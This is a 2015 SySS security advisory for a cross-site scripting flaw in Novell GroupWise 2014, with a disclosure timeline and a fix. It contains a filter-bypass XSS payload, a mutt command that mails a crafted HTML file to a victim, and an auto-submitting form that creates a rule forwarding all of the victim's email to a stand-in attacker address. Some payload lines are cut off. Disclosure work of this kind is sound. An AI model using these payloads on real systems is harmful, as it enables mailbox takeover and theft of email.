Product: GroupWise
Vendor: Novell
Affected Version(s): 2014
Tested Version(s): 2014
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2015-05-04
Solution Date: 2015-07-06
Public Disclosure: 2015-07-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Adrian Vollmer (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Novell GroupWise 2014 is an email web client which also features an
address book, a calendar and a task management tool.
The vendor Novell describes the product as follows (see [1]):
"GroupWise 2014 gives employees robust email, calendaring, task management
and contact management tools wherever they wander. The same goes for admins,
who get streamlined, web-based administration and more to let them monitor,
manage and make things happen on the go."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Novell GroupWise 2014 is vulnerable to Cross Site Scripting attacks. In
combination, these vulnerabilities enable an attacker to perform various
actions in the context of the victim's session. Sending a specially crafted
email to the victim leads to JavaScript code being executed upon opening.
This code can then send emails in the victim's name, create a rule to
forward all future incoming emails to an email address chosen by the
attacker, or possibly even forward existing emails in the victim's mailbox.
In particular, the filter that is supposed to remove malicious code can be
bypassed by appending an invalid attribute to the actual attribute of an
HTML tag without using a separating space like this:
<body o=''onload=alert('XSS')>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following command sends an email to a victim that will, when opened,
create a new rule to forward all future emails addressed to the victim to
evil@attacker.invalid.
mutt -e "set content_type=text/html" victim@groupwise-webapp.com -s "Re: Pentest" < payload.html
The content of the file payload.html is:
<html>
<body o=''onload="document.
Lorem ipsum dolor
<form id="Form" action="https://vulnerable.
<input id="usercontext" type="hidden" name="User.context" value="" />
<input type="hidden" name="action" value="Rule.Create" />
<input type="hidden" name="Rule.type" value="Forward" />
<input type="hidden" name="Compose.id" value="" />
<input type="hidden" name="merge" value="ruleadd" />
<input type="hidden" name="error" value="ruleadd" />
<input type="hidden" name="Url.Rule.Action" value="1" />
<input type="hidden" name="Rule.name" value="newautomatedrule" />
<input type="hidden" name="RuleConditionfield" value="To" />
<input type="hidden" name="RuleConditioncondition" value="Contains" />
<input type="hidden" name="RuleConditiontext" value="Forward" />
<input type="hidden" name="Item.toName" value="evil@attacker.
<input type="hidden" name="Item.to" value="evil@attacker.
<input type="hidden" name="Item.ccName" value="" />
<input type="hidden" name="Item.cc" value="" />
<input type="hidden" name="Item.bcName" value="" />
<input type="hidden" name="Item.bc" value="" />
<input type="hidden" name="Item.subject" value="" />
<input type="hidden" name="Rule.subjectPrefix" value="Fwd:" />
<input type="hidden" name="Item.message" value="" />
<input type="hidden" name="Rule.Create" value="" />
</form>
</body>
</html>
The number of the array element (here: 3) may be dependent on the particular
installation and configuration of GroupWise. It refers to the part in the
URL which represents the "User.context", a parameter resembling an anti-CSRF
token which is transmitted as a GET parameter.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Apply the Support Pack 2 provided by Novell.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-04-28: Vulnerability discovered
2015-05-04: Vendor notified
2015-05-11: Vendor notified a second time
2015-05-12: Vendor acknowledged notification
2015-07-06: Vendor published patch
2015-07-16: Advisory published
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product Web Site for Novell GroupWise 2014
https://www.novell.com/
[2] SySS Policy for Responsible Disclosure
https://www.syss.de/en/news/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
Security vulnerability found by Dr. Adrian Vollmer of the SySS GmbH.
E-Mail: adrian.vollmer@syss.de
Public Key: https://www.syss.de/fileadmin/
Key ID: 0x037C9FE7
Key Fingerprint: 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/
Komentarų nėra:
Rašyti komentarą